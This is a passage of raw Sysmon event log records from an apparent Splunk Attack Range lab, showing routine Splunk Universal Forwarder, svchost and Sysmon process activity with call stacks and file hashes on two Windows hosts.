Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.076{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A452A31E87D2F6CE93825ECF4B085FE,SHA256=FF8B0111AD3F5ED5AE35EC6F1A979E7C6B16350916DD188BCFF2023E5FD86E7A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:27.150{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78219CE3B050DDD592BB1E3E5BFDEFA,SHA256=FAEE751C763C04C668100C74416DB557030CCB82EC1B32829D28DD17258DBC89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.638{0C1E0330-F443-60EB-6A79-00000000D001}1640416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.591{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEE0DA56ED8E1A1686BC738466EA06B,SHA256=3A21864CF870FE8D7CB3BF729F2C026126D7EFB62D2F5AE6955679935E2F88FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807242Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.435{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:28.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C1431789641D10AC74B21DF38A31591,SHA256=2E87DC8136142C4869295EA58C6ECB351DA64D8C76EEEEAED399971B53EF6D60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.154{0C1E0330-F444-60EB-6B79-00000000D001}26963116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F444-60EB-6B79-00000000D001}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:50:28.013{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 